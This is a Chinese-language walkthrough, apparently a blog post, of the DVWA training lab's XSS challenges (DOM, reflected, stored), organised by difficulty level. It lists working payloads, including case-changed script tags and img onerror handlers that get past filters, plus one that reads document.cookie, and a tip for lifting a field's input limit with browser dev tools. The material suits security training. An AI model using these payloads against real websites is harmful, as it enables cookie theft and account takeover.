目录
1. xxs(dom)
1.1 low
1.2 medium
1.3 high
1.4 impossible
2. xss(reflected) 反射型
2.1 low
2.2 medium
2.3 high
2.4 impossible
3. xss(stored)存储型 --留言板
3.1 low
3.2 medium
3.3 high
3.4 impossible
1. xxs(dom)
1.1 low
直接在url或者输入款输入
<script>alert(1)</script>
1.2 medium
</select><img src='1' οnerrοr='alert(1)'>
</select><img src=1 onerror=alert(1)>
如果出现破碎图片,说明命令有问题,需要手动输入,不能复制粘贴,后面发现onerror有问题,删除手动输入即可,我在这一步卡了很久
1.3 high
1. 使用锚部分弹窗
French#<script>alert(1)</script>
French<script>alert(1)</script>
French<script>alert(document.cookie)</script>
1.4 impossible
无漏洞
2. xss(reflected) 反射型
2.1 low
输入什么输出什么
<script>alert(1)</script>
2.2 medium
<script>alert(1)</script>失效
<Script>alert(1)</Script>
大小写,需要在输入框输入,不能直接在url输入,url输入会直接转化为小写
源码,将<script>字符切换成空白
2.3 high
使用<img src=1 οnerrοr=alert(1);> 成功
<img src=1 οnerrοr=alert("qiu")> 成功
2.4 impossible
******
3. xss(stored)存储型 --留言板
3.1 low
<script>alert(1)</script>
3.2 medium
Message测试<Script>alert(1)</Script>无效。
name栏测试<Script>alert(1)</Script>可以,f12尝试解除name限制输入。
其他漏洞切换到xxs(stored),只要留言板存在恶意script语句,就会触发xss漏洞。
3.3 high
<img src=1 οnerrοr=alert(1)>
3.4 impossible
无漏洞
参考:
DVWA靶场(七、盲注) - tonywell - 博客园
dvwa靶场通关教程(保姆及教学,一看就会)_dvwa通关教程-CSDN博客
DVWA-XSS(DOM型) - 西夏一品唐 - 博客园